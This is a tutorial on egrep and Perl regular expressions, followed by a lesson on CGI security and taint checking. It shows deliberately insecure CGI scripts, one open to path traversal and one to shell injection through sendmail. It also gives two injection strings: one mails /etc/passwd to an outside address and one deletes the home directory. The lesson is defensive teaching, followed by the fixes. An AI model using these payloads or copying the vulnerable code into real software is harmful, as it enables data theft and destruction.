

Regular expressions are an incredibly powerful shorthand for searching, replacing, and matching strings. A very simple regular expression might look like:
/^andrew/
/(this|that)/
Grep is a UNIX command-line tool designed for searching files. Given a search pattern (a regular expression) and a file, grep returns all of the lines in the file that contain the search pattern. Grep can handle most regular expressions, so we're going to be using it as an introductory tool, before moving on to Perl regular expressions. We're actually using a version of grep called egrep, and here is the syntax:
egrep 'regular expression' filename
The examples below search a file named testfile, which contains these lines:
mississippi
andrew
dog
cat
john
john doe
missouri
the quick brown fox jumps over the lazy dog.
kayak
-jailshell-2.05b$ egrep 'doe' testfile
john doe
-jailshell-2.05b$ egrep 'rew' testfile
andrew
-jailshell-2.05b$ egrep 'ss' testfile
mississippi
missouri
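The caret (^) anchors a pattern to the beginning of a line, and the dollar sign ($) anchors it to the end. For example:
-jailshell-2.05b$ egrep '^a' testfile
andrew
-jailshell-2.05b$ egrep '^mi' testfile
mississippi
missouri
-jailshell-2.05b$ egrep '^john' testfile
john
john doe
-jailshell-2.05b$ egrep '^john$' testfile
john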
The period (.) character will match any single character, except the new line (\n) character. For example:
-jailshell-2.05b$ egrep 'd.g' testfile
dog
the quick brown fox jumps over the lazy dog.
-jailshell-2.05b$ egrep '..ss.ss....' testfile
mississippi
The pipe (|) character "separates alternatives" [1]. For example:
-jailshell-2.05b$ egrep 'andrew|john' testfile
andrew
john
john doe
Quantifier special characters specify how many times the preceding character can match. Here is a table of quantifiers:
| Character | Description |
|---|---|
| + | The plus sign indicates that the preceding character may occur one or more times |
| ? | The question mark indicates that the preceding character may occur at most one time |
| * | The asterisk indicates that the preceding character may occur zero or more times |
| {n} | The preceding character must occur n times. |
| {n,} | The preceding character must occur at least n times. |
| {n,m} | The preceding character must occur at least n times, but not more than m times. |
And some examples:
-jailshell-2.05b$ egrep 'a.+w' testfile
andrew
-jailshell-2.05b$ egrep '^.{3}$' testfile
dog
cat
You can use parentheses and alternation to group alternatives.
-jailshell-2.05b$ egrep '^.(o|a).$' testfile
dog
cat
-jailshell-2.05b$ egrep '(ss|fox|doe)' testfile
mississippi
john doe
missouri
the quick brown fox jumps over the lazy dog.
Parentheses also capture the text they match, and \1, \2, and so on refer back to the first, second, and later captured groups:
-jailshell-2.05b$ egrep '(.)(.).\2\1' testfile
mississippi
kayak
Character classes are created with square brackets ([]). They represent a list of alternative characters and are essentially shorthand for a group of single-character alternatives. The character class [abc] matches any single character that is an a, b, or c, and is equivalent to (a|b|c). Do not confuse character classes with groups: a character class lists alternative characters, not words. Therefore, [andrew] matches any one of the characters a, n, d, r, e, and w, not the string andrew. A caret (^) at the beginning of a character class negates it, so the class matches any character that is not listed. Don't confuse it with a caret at the beginning of the regular expression, which anchors the match to the beginning of the line, as we saw before. Examples:
-jailshell-2.05b$ egrep '^[mispour]+$' testfile
mississippi
missouri
-jailshell-2.05b$ egrep '^[^mispour]+$' testfile
cat
kayak
A nice feature of character classes is that you can use ranges. Ranges are specified with the dash (-) character, and they look like this: [a-z]. You can also combine multiple ranges in one class. This would match any alphanumeric character: [a-zA-Z0-9].
Now try these examples for yourself! Try to come up with lots of different patterns and experiment with them. I recommend that you remember to use the shell history (hit the up arrow on your keyboard) to save yourself typing.
Regular expressions in Perl are very similar to the regular expressions that we've just covered. Perl just takes them one step further. For the definitive guide to Perl regular expressions, see the perldoc perlre page.
In Perl, regular expressions can take quite a few forms, but the most common uses the =~ operator. The =~ operator performs a regular expression test on the variable to the left of the operator, using the expression to the right of the operator. In general, Perl regular expressions will be inside forward slashes (//). Here is an example:
#!/usr/bin/perl
$j = "this is my test string";
if ($j =~ /test/) {
    print "Yup, it matches!\n";
}

# Parentheses capture part of the match; the first group is available as $1.
$j = "My name is Andrew.";
if ($j =~ /name is (\w*)\./) {
    print "Yup, it matches, and your name is $1!\n";
}
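The egrep patterns from the earlier examples carry over to Perl almost unchanged. As a rough sketch, the script below replays a few of them against the same test words. The helper name `matching_lines` and the `@lines` array are made up for illustration; they are not part of the original lesson.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# The contents of the test file used in the egrep examples.
my @lines = (
    "mississippi", "andrew", "dog", "cat", "john", "john doe",
    "missouri", "the quick brown fox jumps over the lazy dog.", "kayak",
);

# Hypothetical helper: return the candidates that match a pattern,
# much as egrep prints the matching lines of a file.
sub matching_lines {
    my ($pattern, @candidates) = @_;
    return grep { $_ =~ $pattern } @candidates;
}

print join(", ", matching_lines(qr/^john$/, @lines)), "\n";       # anchors:        john
print join(", ", matching_lines(qr/^.{3}$/, @lines)), "\n";       # quantifier:     dog, cat
print join(", ", matching_lines(qr/^.(o|a).$/, @lines)), "\n";    # grouping:       dog, cat
print join(", ", matching_lines(qr/(.)(.).\2\1/, @lines)), "\n";  # backreferences: mississippi, kayak
```

Each printed line should agree with the corresponding egrep output shown earlier, which is a quick way to check that a pattern means the same thing in both tools.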
Citing from perlre:
\w Match a "word" character (alphanumeric plus "_")
\W Match a non-word character
\s Match a whitespace character
\S Match a non-whitespace character
\d Match a digit character
\D Match a non-digit character
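To see these shorthand classes working together, here is a minimal sketch that pulls a name and a number out of a "key = value" line. The helper `parse_setting` and the sample input are invented for this illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: split a "key = value" line into its two parts.
# \s* skips optional whitespace, (\w+) captures the key,
# and (\d+) captures a value made only of digits.
sub parse_setting {
    my ($line) = @_;
    if ($line =~ /^\s*(\w+)\s*=\s*(\d+)\s*$/) {
        return ($1, $2);
    }
    return;    # empty list when the line does not fit the pattern
}

my ($key, $value) = parse_setting("  max_users = 25 ");
print "$key is set to $value\n" if defined $key;    # max_users is set to 25
```

Because the value is matched with \d+, a line such as "max_users = lots" is rejected instead of being half-parsed.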
Another common regular expression formulation in Perl looks like:
$variable =~ s/find/replace/gi;
More examples:
# Remove HTML tags (not a particularly good way to do this)
$variable =~ s/\<[^\>]+\>//g;
# Filter input, leaving only numbers.
$shouldBeNumber =~ s/[^0-9]//g;
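In the substitution form, the g modifier replaces every occurrence rather than only the first, and the i modifier makes the match case-insensitive. The following sketch shows both; the helper names `fix_capitalization` and `digits_only` are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: replace "perl", in any capitalization, with "Perl".
sub fix_capitalization {
    my ($text) = @_;
    $text =~ s/perl/Perl/gi;    # g: all occurrences, i: ignore case
    return $text;
}

# Hypothetical helper: delete everything except the digits 0-9.
sub digits_only {
    my ($text) = @_;
    $text =~ s/[^0-9]//g;
    return $text;
}

print fix_capitalization("PERL, perl, and pErL"), "\n";    # Perl, Perl, and Perl
print digits_only("(555) 123-4567"), "\n";                 # 5551234567
```

Both helpers work on a copy of their argument, so the caller's variable is left unchanged.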
The following is copied from Steve Litt's Perl of Wisdom: Perl Regular Expressions:
"Perl regular expressions normally match the longest string possible. For instance:
my($text) = "mississippi"; $text =~ m/(i.*s)/; print $1 . "\n";
ississ
my($text) = "mississippi"; $text =~ m/(i.*?s)/; print $1 . "\n";
is
We've only scratched the surface of what regular expressions can do. To learn more, try these resources:
"The problem with CGI scripts is that each one presents yet another opportunity for exploitable bugs. CGI scripts should be written with the same care and attention given to Internet servers themselves, because, in fact, they are miniature servers. Unfortunately, for many Web authors, CGI scripts are their first encounter with network programming." -- w3.org Security Faq
Now that we've talked about regular expressions, we're equipped to discuss a very important issue: Perl and CGI security. Today we will cover taint checking and Perl security. In the next few lessons, we will cover other aspects of security in web publishing.
Whenever you're writing CGI scripts, it is essential that you take security into account. Maintaining good security makes it harder for someone to accidentally or maliciously gain access to your account, your server, and your data. Keep these points in mind:
Let me show you a few examples where security is an issue.
The following CGI script is not secure! Don't use it!
#!/usr/bin/perl
use CGI;
$c = new CGI;
print $c->header();
print "<html><head><title>Data lookup</title></head><body>\n";
$dataFile = "/home/acantino/datafiles/" . $c->param('file');
open(FILE, $dataFile);
@data = <FILE>;
close(FILE);
print "Data:<br>\n";
print @data;
print "</body></html>";
...
$file = $c->param('file');
$file =~ s/[\.]//g;
$dataFile = "/home/acantino/datafiles/" . $file;
open(FILE, $dataFile);
...
$file = $c->param('file');
$file =~ s/[^a-zA-Z0-9]//g;
One way to send an e-mail from Perl would look like this [2]: (Again, don't actually do this!)
#!/usr/bin/perl
use CGI;
$c = new CGI;
$mail_to = $c->param('email');
print $c->header();
if ($mail_to =~ /.*?\@.*?\..*?/) {
open (MAIL,"|/usr/lib/sendmail $mail_to");
print MAIL "To: $mail_to\nFrom: me\@test.com\n\n";
print MAIL "This is a very insecure example e-mail!\n";
close(MAIL);
print "sent an e-mail!\n";
} else {
print "Sorry, not an e-mail address!\n";
}
junk@notreal.com; mail bhat@crackers.org < /etc/passwd;
junk@notreal.com; rm -r ~/*;
$mail_to =~ s/[^a-zA-Z0-9\.\-\_\@]//g;
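Stripping characters quietly changes what the user typed, so another option is to reject anything that does not look like an address and to keep the shell out of the picture entirely. The sketch below is one possible approach, not a complete e-mail validator: `checked_address` and `send_notice` are hypothetical helpers, the pattern is deliberately narrow, and the sendmail path is the one assumed in the example above.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: return the address if it fits a narrow pattern,
# or undef otherwise. The first character must be a letter or digit, so
# the address cannot start with "-" and be mistaken for a sendmail option.
sub checked_address {
    my ($raw) = @_;
    return undef unless defined $raw;
    if ($raw =~ /\A([a-zA-Z0-9][a-zA-Z0-9._-]*\@[a-zA-Z0-9][a-zA-Z0-9.-]*\.[a-zA-Z]{2,})\z/) {
        return $1;
    }
    return undef;
}

# Hypothetical helper: the list form of a piped open runs sendmail
# directly, with no shell in between, so ";" and "<" are never interpreted.
# The -t flag tells sendmail to take the recipient from the message headers.
sub send_notice {
    my ($to) = @_;
    open(my $mail, '|-', '/usr/lib/sendmail', '-t', '-oi')
        or die "Cannot run sendmail: $!";
    print $mail "To: $to\nFrom: me\@test.com\n\n";
    print $mail "This is a test e-mail.\n";
    close($mail) or die "sendmail failed: $!";
}

# One of the malicious inputs shown above is rejected outright.
my $address = checked_address('junk@notreal.com; rm -r ~/*;');
print defined($address) ? "Address accepted\n" : "Sorry, not an e-mail address!\n";
```

A script would call `send_notice` only with a value returned by `checked_address`, never with the raw form parameter.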
To make the open command more secure, avoid pipes, explicitly use >, >>, or <, and use open with this syntax:
open(FILEHANDLE, "<", $filepath);
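Putting the filename filter and the three-argument open together might look like the sketch below. It assumes data files are named with letters and digits only; `read_data_file` and its parameters are hypothetical names chosen for this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: read a data file whose name came from the user.
# Returns a reference to the list of lines, or undef on any failure.
sub read_data_file {
    my ($dir, $name) = @_;
    return undef unless defined $name;

    # Accept only letters and digits, so "../" and "|" can never appear.
    my ($safe) = $name =~ /\A([a-zA-Z0-9]+)\z/
        or return undef;

    # Three-argument open: the mode is fixed to "<", so the path is
    # never interpreted as a pipe or an output redirection.
    open(my $fh, "<", "$dir/$safe") or return undef;
    my @data = <$fh>;
    close($fh);
    return \@data;
}

# A path traversal attempt is refused before open is ever called.
my $data = read_data_file("/home/acantino/datafiles", "../../etc/passwd");
print defined($data) ? @$data : "No such data file.\n";
```

Rejecting a bad name, rather than stripping characters from it, keeps a request for one file from silently turning into a request for another.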
Besides open, you also need to be very careful when using any command that executes a shell or code. Use the following extremely carefully, and always completely filter anything coming from the Internet or user.
The following sites are excellent:
Because CGI scripts are notorious for security holes, Perl provides something called taint checking. Tainted data is data that has come from a user and has not been filtered. Taint checking is a run-time [3] process that limits where tainted data can be used.
In your CGI script, use the -T option when calling Perl. I also recommend that you redirect STDERR so that you can maintain an error log for your script.
#!/usr/bin/perl -T
$errorLog = "/home/acantino/public_html/test/error";
open (STDERR, ">>$errorLog");
Any data that has come from a user will be internally marked as tainted. Any time you add tainted data to existing data, the existing data becomes tainted. Perl will exit with an error when you try to use tainted data in a function that could be potentially dangerous, such as system, backtick operators, piped open(), etc.
Because taint checking is a runtime process, a bad script will usually run, but not function properly, so you have to thoroughly test your code.
The whole point of taint checking is to make your script securely use user data. To do this, we have to untaint data with regular expressions. The only [4] way that you can untaint data is to pull out a sub-expression from your user data:
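$email = $c->param('email'); # tainted
# Anchor both ends and require at least one character; otherwise the
# pattern matches any input (even an empty string) and the else branch never runs.
if ($email =~ m/^([a-zA-Z0-9\.\_\-\@]+)$/) { # $email still tainted
    $email = $1; # $email no longer tainted
} else {
    print "E-mail invalid!\n";
}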
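Since every untainting step follows the same shape (match, then keep only the captured text), it can be wrapped in a small routine. The following is a sketch under that assumption; `untaint` is a hypothetical helper, and each pattern passed to it must contain exactly one capture group.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hypothetical helper: return the text captured by $pattern, or undef if
# $value does not match. Under -T the captured text is untainted, so the
# pattern should be as strict as the data allows.
sub untaint {
    my ($value, $pattern) = @_;
    return undef unless defined $value;
    return $value =~ $pattern ? $1 : undef;
}

my $age  = untaint("42",        qr/\A(\d{1,3})\z/);
my $file = untaint("../secret", qr/\A([a-zA-Z0-9]+)\z/);

print defined($age)  ? "age ok: $age\n"   : "age rejected\n";     # age ok: 42
print defined($file) ? "file ok: $file\n" : "file rejected\n";    # file rejected
```

A pattern such as (.*) would untaint anything at all, which defeats the purpose of taint checking, so the helper is only as safe as the patterns given to it.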
Taint checking also slightly modifies the functioning of system(), require(), and use() commands. You may see something like the following:
Insecure $ENV{PATH} while running with -T switch at test.cgi line 9.
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)}; # Make %ENV safer
$ENV{'PATH'} = '/bin:/usr/bin:/usr/local/bin';
I highly recommend that you read the following page to learn more:
As a final side note, there are a few security concerns that distinguish GET and POST when used in CGI scripts.
Clearly, POST is usually better than GET. Nonetheless, neither is really secure. It's still not safe to embed raw passwords or confidential information in either GET or POST. Use cookies as session keys instead, and read the AppSec FAQ.
Spend some time playing with RegEx, grep, and Perl. Try any of the following:
Try writing a CGI script that takes data from the user and sends an e-mail message or opens a file in a secure way. Think about what we've learned and be careful. (Perhaps you should show me the script once you've written it, so we can make sure it's safe to put online.)
Read about CGI and web security at these sites:
 
[1] - http://en.wikipedia.org/wiki/Regular_expression
 
[2] - Example borrowed from http://www.extropia.com/tutorials/security/index.html
 
[3] - Here, run-time means that the Perl interpreter does taint checking as it interprets your program at run-time -- as the program is running.
 
[4] - Well, almost. The only 'good' way to untaint data!